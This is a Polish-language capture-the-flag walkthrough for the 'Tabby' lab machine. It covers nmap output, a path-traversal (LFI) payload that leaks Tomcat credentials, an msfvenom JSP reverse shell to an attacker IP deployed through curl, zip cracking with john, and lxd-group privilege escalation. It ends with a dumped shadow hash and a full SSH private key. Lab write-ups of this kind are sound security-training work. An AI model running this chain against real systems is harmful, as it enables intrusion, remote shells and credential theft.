Tabby

Nmap

nmap -sC -sV -p- -T5 -Pn 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 20:01 BST
Nmap scan report for 10.10.10.194
Host is up, received user-set (0.038s latency).
Not shown: 43732 filtered ports, 21801 closed ports
Reason: 43732 no-responses and 21801 resets
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT  STATE SERVICE REASON     VERSION
22/tcp open ssh   syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http  syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.73 seconds

User

Na głównej stronie mamy link mówiący o LFI http://megahosting.htb/news.php?file= następnie po enumeracji znajdujemy credsy do tomcata
view-source:http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
http://10.10.10.194:8080/host-manager/html
tomcat : $3cureP4s5w0rd123!

Następnie w dokumentacji jest wrzucanie pliku przez
10.10.10.194:8080/manager/text/deploy?path=
reverse shell trzeba wygenerować venomem

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.182 LPORT=9090 -f war > shell.war 

curl -T ./shell.war -u tomcat:'$3cureP4s5w0rd123!' "10.10.10.194:8080/manager/text/deploy?path=/myapp&update=true"
/myapp/<Name>.jsp
jest to nazwa pliku jsp w warze który wygenerował venom więc trzeba ręcznie zajrzeć.
później odpalamy plik (rev shell) przez wejście na stronę:

10.10.10.194/myapp/<Name>.jsp

mamy użytkownika apache
Po przeszukaniu katalogów znajdujemy plik zip

/var/www/html/files/16162020_backup.zip

Ściągamy go i łamiemy johnem

zip2john 16162020_backup.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

admin@it

mamy hasło co się okazuje do użytkownika ash

su ash
admin@it
ash@tabby:~$ cat user.txt
7766f7b86fd***f4a4e016

Root

ash@tabby:/root$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)


https://www.hackingarticles.in/lxd-privilege-escalation/

ash jest w grupie lxd. Do eskalacji przydaje się artykuł:

Na swojej maszynie ściągamy i budujemy alpine’a

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

wrzucamy plik (około 3mb) na hosta i wykonujemy komendy zgodnie z instrukcją

lxc image import ./alpine[...].tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

mamy podmontowany system plików pod /mnt/root

root@tabby:~# cat /mnt/root/root/root.txt
7e5cc2c6e52***30a782e0cc11a

bonus

root@tabby:~# cat /etc/shadow

root:$6$86Nxy4plrFeu0w4C$IfFB5j7BEbjBrUOtkmxyfUZ0lnNIxAcFn3meuvjGqFPSIogXynKx9FU1w3XJIC60rvwuKcg6feaeBqcNWMO0H/:18429:0:99999:7:::
root@tabby:~# cat .ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Leave a Comment